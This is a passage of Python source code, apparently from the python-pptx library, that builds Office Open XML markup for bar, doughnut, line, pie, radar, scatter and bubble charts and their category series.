return ' <c:barDir val="col"/>\n'
raise NotImplementedError(
'no _barDir_xml() for chart type %s' % self._chart_type
)
@property
def _cat_ax_pos(self):
return {
XL_CHART_TYPE.BAR_CLUSTERED: 'l',
XL_CHART_TYPE.BAR_STACKED: 'l',
XL_CHART_TYPE.BAR_STACKED_100: 'l',
XL_CHART_TYPE.COLUMN_CLUSTERED: 'b',
XL_CHART_TYPE.COLUMN_STACKED: 'b',
XL_CHART_TYPE.COLUMN_STACKED_100: 'b',
}[self._chart_type]
@property
def _cat_ax_xml(self):
categories = self._chart_data.categories
if categories.are_dates:
return (
' <c:dateAx>\n'
' <c:axId val="-2068027336"/>\n'
' <c:scaling>\n'
' <c:orientation val="minMax"/>\n'
' </c:scaling>\n'
' <c:delete val="0"/>\n'
' <c:axPos val="{cat_ax_pos}"/>\n'
' <c:numFmt formatCode="{nf}" sourceLinked="1"/>\n'
' <c:majorTickMark val="out"/>\n'
' <c:minorTickMark val="none"/>\n'
' <c:tickLblPos val="nextTo"/>\n'
' <c:crossAx val="-2113994440"/>\n'
' <c:crosses val="autoZero"/>\n'
' <c:auto val="1"/>\n'
' <c:lblOffset val="100"/>\n'
' <c:baseTimeUnit val="days"/>\n'
' </c:dateAx>\n'
).format(**{
'cat_ax_pos': self._cat_ax_pos,
'nf': categories.number_format,
})
return (
' <c:catAx>\n'
' <c:axId val="-2068027336"/>\n'
' <c:scaling>\n'
' <c:orientation val="minMax"/>\n'
' </c:scaling>\n'
' <c:delete val="0"/>\n'
' <c:axPos val="{cat_ax_pos}"/>\n'
' <c:majorTickMark val="out"/>\n'
' <c:minorTickMark val="none"/>\n'
' <c:tickLblPos val="nextTo"/>\n'
' <c:crossAx val="-2113994440"/>\n'
' <c:crosses val="autoZero"/>\n'
' <c:auto val="1"/>\n'
' <c:lblAlgn val="ctr"/>\n'
' <c:lblOffset val="100"/>\n'
' <c:noMultiLvlLbl val="0"/>\n'
' </c:catAx>\n'
).format(**{
'cat_ax_pos': self._cat_ax_pos,
})
@property
def _grouping_xml(self):
XL = XL_CHART_TYPE
clustered_types = (XL.BAR_CLUSTERED, XL.COLUMN_CLUSTERED)
stacked_types = (XL.BAR_STACKED, XL.COLUMN_STACKED)
percentStacked_types = (XL.BAR_STACKED_100, XL.COLUMN_STACKED_100)
if self._chart_type in clustered_types:
return ' <c:grouping val="clustered"/>\n'
elif self._chart_type in stacked_types:
return ' <c:grouping val="stacked"/>\n'
elif self._chart_type in percentStacked_types:
return ' <c:grouping val="percentStacked"/>\n'
raise NotImplementedError(
'no _grouping_xml() for chart type %s' % self._chart_type
)
@property
def _overlap_xml(self):
XL = XL_CHART_TYPE
percentStacked_types = (
XL.BAR_STACKED, XL.BAR_STACKED_100, XL.COLUMN_STACKED,
XL.COLUMN_STACKED_100,
)
if self._chart_type in percentStacked_types:
return ' <c:overlap val="100"/>\n'
return ''
@property
def _ser_xml(self):
xml = ''
for series in self._chart_data:
xml_writer = _CategorySeriesXmlWriter(series)
xml += (
' <c:ser>\n'
' <c:idx val="{ser_idx}"/>\n'
' <c:order val="{ser_order}"/>\n'
'{tx_xml}'
'{cat_xml}'
'{val_xml}'
' </c:ser>\n'
).format(**{
'ser_idx': series.index,
'ser_order': series.index,
'tx_xml': xml_writer.tx_xml,
'cat_xml': xml_writer.cat_xml,
'val_xml': xml_writer.val_xml,
})
return xml
@property
def _val_ax_pos(self):
return {
XL_CHART_TYPE.BAR_CLUSTERED: 'b',
XL_CHART_TYPE.BAR_STACKED: 'b',
XL_CHART_TYPE.BAR_STACKED_100: 'b',
XL_CHART_TYPE.COLUMN_CLUSTERED: 'l',
XL_CHART_TYPE.COLUMN_STACKED: 'l',
XL_CHART_TYPE.COLUMN_STACKED_100: 'l',
}[self._chart_type]
class _DoughnutChartXmlWriter(_BaseChartXmlWriter):
"""
Provides specialized methods particular to the ``<c:doughnutChart>``
element.
"""
@property
def xml(self):
return (
'<?xml version=\'1.0\' encoding=\'UTF-8\' standalone=\'yes\'?>\n'
'<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawin'
'gml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/draw'
'ingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/off'
'iceDocument/2006/relationships">\n'
' <c:date1904 val="0"/>\n'
' <c:roundedCorners val="0"/>\n'
' <c:chart>\n'
' <c:autoTitleDeleted val="0"/>\n'
' <c:plotArea>\n'
' <c:layout/>\n'
' <c:doughnutChart>\n'
' <c:varyColors val="1"/>\n'
'{ser_xml}'
' <c:dLbls>\n'
' <c:showLegendKey val="0"/>\n'
' <c:showVal val="0"/>\n'
' <c:showCatName val="0"/>\n'
' <c:showSerName val="0"/>\n'
' <c:showPercent val="0"/>\n'
' <c:showBubbleSize val="0"/>\n'
' <c:showLeaderLines val="1"/>\n'
' </c:dLbls>\n'
' <c:firstSliceAng val="0"/>\n'
' <c:holeSize val="50"/>\n'
' </c:doughnutChart>\n'
' </c:plotArea>\n'
' <c:legend>\n'
' <c:legendPos val="r"/>\n'
' <c:layout/>\n'
' <c:overlay val="0"/>\n'
' </c:legend>\n'
' <c:plotVisOnly val="1"/>\n'
' <c:dispBlanksAs val="gap"/>\n'
' <c:showDLblsOverMax val="0"/>\n'
' </c:chart>\n'
' <c:txPr>\n'
' <a:bodyPr/>\n'
' <a:lstStyle/>\n'
' <a:p>\n'
' <a:pPr>\n'
' <a:defRPr sz="1800"/>\n'
' </a:pPr>\n'
' <a:endParaRPr/>\n'
' </a:p>\n'
' </c:txPr>\n'
'</c:chartSpace>\n'
).format(**{
'ser_xml': self._ser_xml,
})
@property
def _explosion_xml(self):
if self._chart_type == XL_CHART_TYPE.DOUGHNUT_EXPLODED:
return ' <c:explosion val="25"/>\n'
return ''
@property
def _ser_xml(self):
xml = ''
for series in self._chart_data:
xml_writer = _CategorySeriesXmlWriter(series)
xml += (
' <c:ser>\n'
' <c:idx val="{ser_idx}"/>\n'
' <c:order val="{ser_order}"/>\n'
'{tx_xml}'
'{explosion_xml}'
'{cat_xml}'
'{val_xml}'
' </c:ser>\n'
).format(**{
'ser_idx': series.index,
'ser_order': series.index,
'tx_xml': xml_writer.tx_xml,
'explosion_xml': self._explosion_xml,
'cat_xml': xml_writer.cat_xml,
'val_xml': xml_writer.val_xml,
})
return xml
class _LineChartXmlWriter(_BaseChartXmlWriter):
"""
Provides specialized methods particular to the ``<c:lineChart>`` element.
"""
@property
def xml(self):
return (
'<?xml version=\'1.0\' encoding=\'UTF-8\' standalone=\'yes\'?>\n'
'<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawin'
'gml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/draw'
'ingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/off'
'iceDocument/2006/relationships">\n'
' <c:date1904 val="0"/>\n'
' <c:chart>\n'
' <c:autoTitleDeleted val="0"/>\n'
' <c:plotArea>\n'
' <c:lineChart>\n'
'{grouping_xml}'
' <c:varyColors val="0"/>\n'
'{ser_xml}'
' <c:marker val="1"/>\n'
' <c:smooth val="0"/>\n'
' <c:axId val="2118791784"/>\n'
' <c:axId val="2140495176"/>\n'
' </c:lineChart>\n'
'{cat_ax_xml}'
' <c:valAx>\n'
' <c:axId val="2140495176"/>\n'
' <c:scaling/>\n'
' <c:delete val="0"/>\n'
' <c:axPos val="l"/>\n'
' <c:majorGridlines/>\n'
' <c:majorTickMark val="out"/>\n'
' <c:minorTickMark val="none"/>\n'
' <c:tickLblPos val="nextTo"/>\n'
' <c:crossAx val="2118791784"/>\n'
' <c:crosses val="autoZero"/>\n'
' </c:valAx>\n'
' </c:plotArea>\n'
' <c:legend>\n'
' <c:legendPos val="r"/>\n'
' <c:layout/>\n'
' <c:overlay val="0"/>\n'
' </c:legend>\n'
' <c:plotVisOnly val="1"/>\n'
' <c:dispBlanksAs val="gap"/>\n'
' <c:showDLblsOverMax val="0"/>\n'
' </c:chart>\n'
' <c:txPr>\n'
' <a:bodyPr/>\n'
' <a:lstStyle/>\n'
' <a:p>\n'
' <a:pPr>\n'
' <a:defRPr sz="1800"/>\n'
' </a:pPr>\n'
' <a:endParaRPr lang="en-US"/>\n'
' </a:p>\n'
' </c:txPr>\n'
'</c:chartSpace>\n'
).format(**{
'grouping_xml': self._grouping_xml,
'ser_xml': self._ser_xml,
'cat_ax_xml': self._cat_ax_xml,
})
@property
def _cat_ax_xml(self):
categories = self._chart_data.categories
if categories.are_dates:
return (
' <c:dateAx>\n'
' <c:axId val="2118791784"/>\n'
' <c:scaling>\n'
' <c:orientation val="minMax"/>\n'
' </c:scaling>\n'
' <c:delete val="0"/>\n'
' <c:axPos val="b"/>\n'
' <c:numFmt formatCode="{nf}" sourceLinked="1"/>\n'
' <c:majorTickMark val="out"/>\n'
' <c:minorTickMark val="none"/>\n'
' <c:tickLblPos val="nextTo"/>\n'
' <c:crossAx val="2140495176"/>\n'
' <c:crosses val="autoZero"/>\n'
' <c:auto val="1"/>\n'
' <c:lblOffset val="100"/>\n'
' <c:baseTimeUnit val="days"/>\n'
' </c:dateAx>\n'
).format(**{
'nf': categories.number_format,
})
return (
' <c:catAx>\n'
' <c:axId val="2118791784"/>\n'
' <c:scaling>\n'
' <c:orientation val="minMax"/>\n'
' </c:scaling>\n'
' <c:delete val="0"/>\n'
' <c:axPos val="b"/>\n'
' <c:majorTickMark val="out"/>\n'
' <c:minorTickMark val="none"/>\n'
' <c:tickLblPos val="nextTo"/>\n'
' <c:crossAx val="2140495176"/>\n'
' <c:crosses val="autoZero"/>\n'
' <c:auto val="1"/>\n'
' <c:lblAlgn val="ctr"/>\n'
' <c:lblOffset val="100"/>\n'
' <c:noMultiLvlLbl val="0"/>\n'
' </c:catAx>\n'
)
@property
def _grouping_xml(self):
XL = XL_CHART_TYPE
standard_types = (XL.LINE, XL.LINE_MARKERS)
stacked_types = (XL.LINE_STACKED, XL.LINE_MARKERS_STACKED)
percentStacked_types = (
XL.LINE_STACKED_100, XL.LINE_MARKERS_STACKED_100
)
if self._chart_type in standard_types:
return ' <c:grouping val="standard"/>\n'
elif self._chart_type in stacked_types:
return ' <c:grouping val="stacked"/>\n'
elif self._chart_type in percentStacked_types:
return ' <c:grouping val="percentStacked"/>\n'
raise NotImplementedError(
'no _grouping_xml() for chart type %s' % self._chart_type
)
@property
def _marker_xml(self):
XL = XL_CHART_TYPE
no_marker_types = (XL.LINE, XL.LINE_STACKED, XL.LINE_STACKED_100)
if self._chart_type in no_marker_types:
return (
' <c:marker>\n'
' <c:symbol val="none"/>\n'
' </c:marker>\n'
)
return ''
@property
def _ser_xml(self):
xml = ''
for series in self._chart_data:
xml_writer = _CategorySeriesXmlWriter(series)
xml += (
' <c:ser>\n'
' <c:idx val="{ser_idx}"/>\n'
' <c:order val="{ser_order}"/>\n'
'{tx_xml}'
'{marker_xml}'
'{cat_xml}'
'{val_xml}'
' <c:smooth val="0"/>\n'
' </c:ser>\n'
).format(**{
'ser_idx': series.index,
'ser_order': series.index,
'tx_xml': xml_writer.tx_xml,
'marker_xml': self._marker_xml,
'cat_xml': xml_writer.cat_xml,
'val_xml': xml_writer.val_xml,
})
return xml
class _PieChartXmlWriter(_BaseChartXmlWriter):
"""
Provides specialized methods particular to the ``<c:pieChart>`` element.
"""
@property
def xml(self):
return (
'<?xml version=\'1.0\' encoding=\'UTF-8\' standalone=\'yes\'?>\n'
'<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawin'
'gml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/draw'
'ingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/off'
'iceDocument/2006/relationships">\n'
' <c:chart>\n'
' <c:plotArea>\n'
' <c:pieChart>\n'
' <c:varyColors val="1"/>\n'
'{ser_xml}'
' </c:pieChart>\n'
' </c:plotArea>\n'
' <c:dispBlanksAs val="gap"/>\n'
' </c:chart>\n'
' <c:txPr>\n'
' <a:bodyPr/>\n'
' <a:lstStyle/>\n'
' <a:p>\n'
' <a:pPr>\n'
' <a:defRPr sz="1800"/>\n'
' </a:pPr>\n'
' <a:endParaRPr lang="en-US"/>\n'
' </a:p>\n'
' </c:txPr>\n'
'</c:chartSpace>\n'
).format(**{
'ser_xml': self._ser_xml,
})
@property
def _explosion_xml(self):
if self._chart_type == XL_CHART_TYPE.PIE_EXPLODED:
return ' <c:explosion val="25"/>\n'
return ''
@property
def _ser_xml(self):
xml_writer = _CategorySeriesXmlWriter(self._chart_data[0])
xml = (
' <c:ser>\n'
' <c:idx val="0"/>\n'
' <c:order val="0"/>\n'
'{tx_xml}'
'{explosion_xml}'
'{cat_xml}'
'{val_xml}'
' </c:ser>\n'
).format(**{
'tx_xml': xml_writer.tx_xml,
'explosion_xml': self._explosion_xml,
'cat_xml': xml_writer.cat_xml,
'val_xml': xml_writer.val_xml,
})
return xml
class _RadarChartXmlWriter(_BaseChartXmlWriter):
"""
Generates XML for the ``<c:radarChart>`` element.
"""
@property
def xml(self):
return (
'<?xml version=\'1.0\' encoding=\'UTF-8\' standalone=\'yes\'?>\n'
'<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawin'
'gml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/draw'
'ingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/off'
'iceDocument/2006/relationships">\n'
' <c:date1904 val="0"/>\n'
' <c:roundedCorners val="0"/>\n'
' <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.'
'org/markup-compatibility/2006">\n'
' <mc:Choice xmlns:c14="http://schemas.microsoft.com/office/d'
'rawing/2007/8/2/chart" Requires="c14">\n'
' <c14:style val="118"/>\n'
' </mc:Choice>\n'
' <mc:Fallback>\n'
' <c:style val="18"/>\n'
' </mc:Fallback>\n'
' </mc:AlternateContent>\n'
' <c:chart>\n'
' <c:plotArea>\n'
' <c:layout/>\n'
' <c:radarChart>\n'
' <c:radarStyle val="{radar_style}"/>\n'
' <c:varyColors val="0"/>\n'
'{ser_xml}'
' <c:axId val="2073612648"/>\n'
' <c:axId val="-2112772216"/>\n'
' </c:radarChart>\n'
' <c:catAx>\n'
' <c:axId val="2073612648"/>\n'
' <c:scaling>\n'
' <c:orientation val="minMax"/>\n'
' </c:scaling>\n'
' <c:delete val="0"/>\n'
' <c:axPos val="b"/>\n'
' <c:majorGridlines/>\n'
' <c:numFmt formatCode="m/d/yy" sourceLinked="1"/>\n'
' <c:majorTickMark val="out"/>\n'
' <c:minorTickMark val="none"/>\n'
' <c:tickLblPos val="nextTo"/>\n'
' <c:crossAx val="-2112772216"/>\n'
' <c:crosses val="autoZero"/>\n'
' <c:auto val="1"/>\n'
' <c:lblAlgn val="ctr"/>\n'
' <c:lblOffset val="100"/>\n'
' <c:noMultiLvlLbl val="0"/>\n'
' </c:catAx>\n'
' <c:valAx>\n'
' <c:axId val="-2112772216"/>\n'
' <c:scaling>\n'
' <c:orientation val="minMax"/>\n'
' </c:scaling>\n'
' <c:delete val="0"/>\n'
' <c:axPos val="l"/>\n'
' <c:majorGridlines/>\n'
' <c:numFmt formatCode="General" sourceLinked="1"/>\n'
' <c:majorTickMark val="cross"/>\n'
' <c:minorTickMark val="none"/>\n'
' <c:tickLblPos val="nextTo"/>\n'
' <c:crossAx val="2073612648"/>\n'
' <c:crosses val="autoZero"/>\n'
' <c:crossBetween val="between"/>\n'
' </c:valAx>\n'
' </c:plotArea>\n'
' <c:plotVisOnly val="1"/>\n'
' <c:dispBlanksAs val="gap"/>\n'
' <c:showDLblsOverMax val="0"/>\n'
' </c:chart>\n'
' <c:txPr>\n'
' <a:bodyPr/>\n'
' <a:lstStyle/>\n'
' <a:p>\n'
' <a:pPr>\n'
' <a:defRPr sz="1800"/>\n'
' </a:pPr>\n'
' <a:endParaRPr lang="en-US"/>\n'
' </a:p>\n'
' </c:txPr>\n'
'</c:chartSpace>\n'
).format(**{
'radar_style': self._radar_style,
'ser_xml': self._ser_xml,
})
@property
def _marker_xml(self):
if self._chart_type == XL_CHART_TYPE.RADAR:
return (
' <c:marker>\n'
' <c:symbol val="none"/>\n'
' </c:marker>\n'
)
return ''
@property
def _radar_style(self):
if self._chart_type == XL_CHART_TYPE.RADAR_FILLED:
return 'filled'
return 'marker'
@property
def _ser_xml(self):
xml = ''
for series in self._chart_data:
xml_writer = _CategorySeriesXmlWriter(series)
xml += (
' <c:ser>\n'
' <c:idx val="{ser_idx}"/>\n'
' <c:order val="{ser_order}"/>\n'
'{tx_xml}'
'{marker_xml}'
'{cat_xml}'
'{val_xml}'
' <c:smooth val="0"/>\n'
' </c:ser>\n'
).format(**{
'ser_idx': series.index,
'ser_order': series.index,
'tx_xml': xml_writer.tx_xml,
'marker_xml': self._marker_xml,
'cat_xml': xml_writer.cat_xml,
'val_xml': xml_writer.val_xml,
})
return xml
class _XyChartXmlWriter(_BaseChartXmlWriter):
"""
Generates XML for the ``<c:scatterChart>`` element.
"""
@property
def xml(self):
xml = (
'<?xml version=\'1.0\' encoding=\'UTF-8\' standalone=\'yes\'?>\n'
'<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawin'
'gml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/draw'
'ingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/off'
'iceDocument/2006/relationships">\n'
' <c:chart>\n'
' <c:plotArea>\n'
' <c:scatterChart>\n'
' <c:scatterStyle val="%s"/>\n'
' <c:varyColors val="0"/>\n'
'%s'
' <c:axId val="-2128940872"/>\n'
' <c:axId val="-2129643912"/>\n'
' </c:scatterChart>\n'
' <c:valAx>\n'
' <c:axId val="-2128940872"/>\n'
' <c:scaling>\n'
' <c:orientation val="minMax"/>\n'
' </c:scaling>\n'
' <c:delete val="0"/>\n'
' <c:axPos val="b"/>\n'
' <c:numFmt formatCode="General" sourceLinked="1"/>\n'
' <c:majorTickMark val="out"/>\n'
' <c:minorTickMark val="none"/>\n'
' <c:tickLblPos val="nextTo"/>\n'
' <c:crossAx val="-2129643912"/>\n'
' <c:crosses val="autoZero"/>\n'
' <c:crossBetween val="midCat"/>\n'
' </c:valAx>\n'
' <c:valAx>\n'
' <c:axId val="-2129643912"/>\n'
' <c:scaling>\n'
' <c:orientation val="minMax"/>\n'
' </c:scaling>\n'
' <c:delete val="0"/>\n'
' <c:axPos val="l"/>\n'
' <c:majorGridlines/>\n'
' <c:numFmt formatCode="General" sourceLinked="1"/>\n'
' <c:majorTickMark val="out"/>\n'
' <c:minorTickMark val="none"/>\n'
' <c:tickLblPos val="nextTo"/>\n'
' <c:crossAx val="-2128940872"/>\n'
' <c:crosses val="autoZero"/>\n'
' <c:crossBetween val="midCat"/>\n'
' </c:valAx>\n'
' </c:plotArea>\n'
' <c:legend>\n'
' <c:legendPos val="r"/>\n'
' <c:layout/>\n'
' <c:overlay val="0"/>\n'
' </c:legend>\n'
' <c:plotVisOnly val="1"/>\n'
' <c:dispBlanksAs val="gap"/>\n'
' <c:showDLblsOverMax val="0"/>\n'
' </c:chart>\n'
' <c:txPr>\n'
' <a:bodyPr/>\n'
' <a:lstStyle/>\n'
' <a:p>\n'
' <a:pPr>\n'
' <a:defRPr sz="1800"/>\n'
' </a:pPr>\n'
' <a:endParaRPr lang="en-US"/>\n'
' </a:p>\n'
' </c:txPr>\n'
'</c:chartSpace>\n'
) % (self._scatterStyle_val, self._ser_xml)
return xml
@property
def _marker_xml(self):
no_marker_types = (
XL_CHART_TYPE.XY_SCATTER_LINES_NO_MARKERS,
XL_CHART_TYPE.XY_SCATTER_SMOOTH_NO_MARKERS,
)
if self._chart_type in no_marker_types:
return (
' <c:marker>\n'
' <c:symbol val="none"/>\n'
' </c:marker>\n'
)
return ''
@property
def _scatterStyle_val(self):
smooth_types = (
XL_CHART_TYPE.XY_SCATTER_SMOOTH,
XL_CHART_TYPE.XY_SCATTER_SMOOTH_NO_MARKERS,
)
if self._chart_type in smooth_types:
return 'smoothMarker'
return 'lineMarker'
@property
def _ser_xml(self):
xml = ''
for series in self._chart_data:
xml_writer = _XySeriesXmlWriter(series)
xml += (
' <c:ser>\n'
' <c:idx val="{ser_idx}"/>\n'
' <c:order val="{ser_order}"/>\n'
'{tx_xml}'
'{spPr_xml}'
'{marker_xml}'
'{xVal_xml}'
'{yVal_xml}'
' <c:smooth val="0"/>\n'
' </c:ser>\n'
).format(**{
'ser_idx': series.index,
'ser_order': series.index,
'tx_xml': xml_writer.tx_xml,
'spPr_xml': self._spPr_xml,
'marker_xml': self._marker_xml,
'xVal_xml': xml_writer.xVal_xml,
'yVal_xml': xml_writer.yVal_xml,
})
return xml
@property
def _spPr_xml(self):
if self._chart_type == XL_CHART_TYPE.XY_SCATTER:
return (
' <c:spPr>\n'
' <a:ln w="47625">\n'
' <a:noFill/>\n'
' </a:ln>\n'
' </c:spPr>\n'
)
return ''
class _BubbleChartXmlWriter(_XyChartXmlWriter):
"""
Provides specialized methods particular to the ``<c:bubbleChart>``
element.
"""
@property
def xml(self):
xml = (
'<?xml version=\'1.0\' encoding=\'UTF-8\' standalone=\'yes\'?>\n'
'<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawin'
'gml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/draw'
'ingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/off'
'iceDocument/2006/relationships">\n'
' <c:chart>\n'
' <c:autoTitleDeleted val="0"/>\n'
' <c:plotArea>\n'
' <c:layout/>\n'
' <c:bubbleChart>\n'
' <c:varyColors val="0"/>\n'
'%s'
' <c:dLbls>\n'
' <c:showLegendKey val="0"/>\n'
' <c:showVal val="0"/>\n'
' <c:showCatName val="0"/>\n'
' <c:showSerName val="0"/>\n'
' <c:showPercent val="0"/>\n'
' <c:showBubbleSize val="0"/>\n'
' </c:dLbls>\n'
' <c:bubbleScale val="100"/>\n'
' <c:showNegBubbles val="0"/>\n'
' <c:axId val="-2115720072"/>\n'
' <c:axId val="-2115723560"/>\n'
' </c:bubbleChart>\n'
' <c:valAx>\n'
' <c:axId val="-2115720072"/>\n'
' <c:scaling>\n'
' <c:orientation val="minMax"/>\n'
' </c:scaling>\n'
' <c:delete val="0"/>\n'
' <c:axPos val="b"/>\n'
' <c:numFmt formatCode="General" sourceLinked="1"/>\n'
' <c:majorTickMark val="out"/>\n'
' <c:minorTickMark val="none"/>\n'
' <c:tickLblPos val="nextTo"/>\n'
' <c:crossAx val="-2115723560"/>\n'
' <c:crosses val="autoZero"/>\n'
' <c:crossBetween val="midCat"/>\n'
' </c:valAx>\n'
' <c:valAx>\n'
' <c:axId val="-2115723560"/>\n'
' <c:scaling>\n'
' <c:orientation val="minMax"/>\n'
' </c:scaling>\n'
' <c:delete val="0"/>\n'
' <c:axPos val="l"/>\n'
' <c:majorGridlines/>\n'
' <c:numFmt formatCode="General" sourceLinked="1"/>\n'
' <c:majorTickMark val="out"/>\n'
' <c:minorTickMark val="none"/>\n'
' <c:tickLblPos val="nextTo"/>\n'
' <c:crossAx val="-2115720072"/>\n'
' <c:crosses val="autoZero"/>\n'
' <c:crossBetween val="midCat"/>\n'
' </c:valAx>\n'
' </c:plotArea>\n'
' <c:legend>\n'
' <c:legendPos val="r"/>\n'
' <c:layout/>\n'
' <c:overlay val="0"/>\n'
' </c:legend>\n'
' <c:plotVisOnly val="1"/>\n'
' <c:dispBlanksAs val="gap"/>\n'
' <c:showDLblsOverMax val="0"/>\n'
' </c:chart>\n'
' <c:txPr>\n'
' <a:bodyPr/>\n'
' <a:lstStyle/>\n'
' <a:p>\n'
' <a:pPr>\n'
' <a:defRPr sz="1800"/>\n'
' </a:pPr>\n'
' <a:endParaRPr lang="en-US"/>\n'
' </a:p>\n'
' </c:txPr>\n'
'</c:chartSpace>\n'
) % self._ser_xml
return xml
@property
def _bubble3D_val(self):
if self._chart_type == XL_CHART_TYPE.BUBBLE_THREE_D_EFFECT:
return '1'
return '0'
@property
def _ser_xml(self):
xml = ''
for series in self._chart_data:
xml_writer = _BubbleSeriesXmlWriter(series)
xml += (
' <c:ser>\n'
' <c:idx val="{ser_idx}"/>\n'
' <c:order val="{ser_order}"/>\n'
'{tx_xml}'
' <c:invertIfNegative val="0"/>\n'
'{xVal_xml}'
'{yVal_xml}'
'{bubbleSize_xml}'
' <c:bubble3D val="{bubble3D_val}"/>\n'
' </c:ser>\n'
).format(**{
'ser_idx': series.index,
'ser_order': series.index,
'tx_xml': xml_writer.tx_xml,
'xVal_xml': xml_writer.xVal_xml,
'yVal_xml': xml_writer.yVal_xml,
'bubbleSize_xml': xml_writer.bubbleSize_xml,
'bubble3D_val': self._bubble3D_val,
})
return xml
class _CategorySeriesXmlWriter(_BaseSeriesXmlWriter):
"""
Generates XML snippets particular to a category chart series.
"""
@property
def cat(self):
"""
Return the ``<c:cat>`` element XML for this series, as an oxml
element.
"""
categories = self._series.categories
if categories.are_numeric:
return parse_xml(
self._numRef_cat_tmpl.format(**{
'wksht_ref': self._series.categories_ref,
'number_format': categories.number_format,
'cat_count': categories.leaf_count,
'cat_pt_xml': self._cat_num_pt_xml,
'nsdecls': ' %s' % nsdecls('c'),
})
)
if categories.depth == 1:
return parse_xml(
self._cat_tmpl.format(**{
'wksht_ref': self._series.categories_ref,
'cat_count': categories.leaf_count,
'cat_pt_xml': self._cat_pt_xml,
'nsdecls': ' %s' % nsdecls('c'),
})
)
return parse_xml(
self._multiLvl_cat_tmpl.format(**{
'wksht_ref': self._series.categories_ref,
'cat_count': categories.leaf_count,
'lvl_xml': self._lvl_xml(categories),
'nsdecls': ' %s' % nsdecls('c'),
})
)
@property
def cat_xml(self):
"""
The unicode XML snippet for the ``<c:cat>`` element for this series,
containing the category labels and spreadsheet reference.
"""
categories = self._series.categories
if categories.are_numeric:
return self._numRef_cat_tmpl.format(**{
'wksht_ref': self._series.categories_ref,
'number_format': categories.number_format,
'cat_count': categories.leaf_count,
'cat_pt_xml': self._cat_num_pt_xml,
'nsdecls': '',
})
if categories.depth == 1:
return self._cat_tmpl.format(**{
'wksht_ref': self._series.categories_ref,
'cat_count': categories.leaf_count,
'cat_pt_xml': self._cat_pt_xml,
'nsdecls': '',
})
return self._multiLvl_cat_tmpl.format(**{
'wksht_ref': self._series.categories_ref,
'cat_count': categories.leaf_count,
'lvl_xml': self._lvl_xml(categories),
'nsdecls': '',
})
@property
def val(self):
"""
The ``<c:val>`` XML for this series, as an oxml element.
"""
xml = self._val_tmpl.format(**{
'nsdecls': ' %s' % nsdecls('c'),
'values_ref': self._series.values_ref,
'number_format': self._series.number_format,
'val_count': len(self._series),
'val_pt_xml': self._val_pt_xml,
})
return parse_xml(xml)
@property
def val_xml(self):
"""
Return the unicode XML snippet for the ``<c:val>`` element describing
this series, containing the series values and their spreadsheet range
reference.
"""
return self._val_tmpl.format(**{
'nsdecls': '',
'values_ref': self._series.values_ref,
'number_format': self._series.number_format,
'val_count': len(self._series),
'val_pt_xml': self._val_pt_xml,
})
@property
def _cat_num_pt_xml(self):
"""
The unicode XML snippet for the ``<c:pt>`` elements when category
labels are numeric (including date type).
"""
xml = ''
for idx, category in enumerate(self._series.categories):
xml += (
' <c:pt idx="{cat_idx}">\n'
' <c:v>{cat_lbl_str}</c:v>\n'
' </c:pt>\n'
).format(**{
'cat_idx': idx,
'cat_lbl_str': category.numeric_str_val(self._date_1904),
})
return xml
@property
def _cat_pt_xml(self):
"""
The unicode XML snippet for the ``<c:pt>`` elements containing the
category names for this series.
"""
xml = ''
for idx, category in enumerate(self._series.categories):
xml += (
' <c:pt idx="{cat_idx}">\n'
' <c:v>{cat_label}</c:v>\n'
' </c:pt>\n'
).format(**{
'cat_idx': idx,
'cat_label': escape(to_unicode(category.label)),
})
return xml
@property
def _cat_tmpl(self):
"""
The template for the ``<c:cat>`` element for this series, containing
the category labels and spreadsheet reference.
"""
return (
' <c:cat{nsdecls}>\n'
' <c:strRef>\n'
' <c:f>{wksht_ref}</c:f>\n'
' <c:strCache>\n'
' <c:ptCount val="{cat_count}"/>\n'
'{cat_pt_xml}'
' </c:strCache>\n'
' </c:strRef>\n'
' </c:cat>\n'
)
def _lvl_xml(self, categories):
"""
The unicode XML snippet for the ``<c:lvl>`` elements containing
multi-level category names.
"""
def lvl_pt_xml(level):
xml = ''
for idx, name in level:
xml += (
' <c:pt idx="%d">\n'
' <c:v>%s</c:v>\n'
' </c:pt>\n'
) % (idx, escape('%s' % name))
return xml
xml = ''
for level in categories.levels:
xml += (
' <c:lvl>\n'
'{lvl_pt_xml}'
' </c:lvl>\n'
).format(**{
'lvl_pt_xml': lvl_pt_xml(level),
})
return xml
@property
def _multiLvl_cat_tmpl(self):
"""
The template for the ``<c:cat>`` element for this series when there
are multi-level (nested) categories.
"""
return (
' <c:cat{nsdecls}>\n'
' <c:multiLvlStrRef>\n'
' <c:f>{wksht_ref}</c:f>\n'
' <c:multiLvlStrCache>\n'
' <c:ptCount val="{cat_count}"/>\n'
'{lvl_xml}'
' </c:multiLvlStrCache>\n'
' </c:multiLvlStrRef>\n'
' </c:cat>\n'
)
@property
def _numRef_cat_tmpl(self):
"""
The template for the ``<c:cat>`` element for this series when the
labels are numeric (or date) values.
"""
return (
' <c:cat{nsdecls}>\n'
' <c:numRef>\n'
' <c:f>{wksht_ref}</c:f>\n'
' <c:numCache>\n'
' <c:formatCode>{number_format}</c:formatCode>\n'
' <c:ptCount val="{cat_count}"/>\n'
'{cat_pt_xml}'
' </c:numCache>\n'
' </c:numRef>\n'
' </c:cat>\n'
)
@property
def _val_pt_xml(self):
"""
The unicode XML snippet containing the ``<c:pt>`` elements containing
the values for this series.
"""
xml = ''
for idx, value in enumerate(self._series.values):
if value is None:
continue
xml += (
' <c:pt idx="{val_idx:d}">\n'
' <c:v>{value}</c:v>\n'
' </c:pt>\n'
).format(**{
'val_idx': idx,
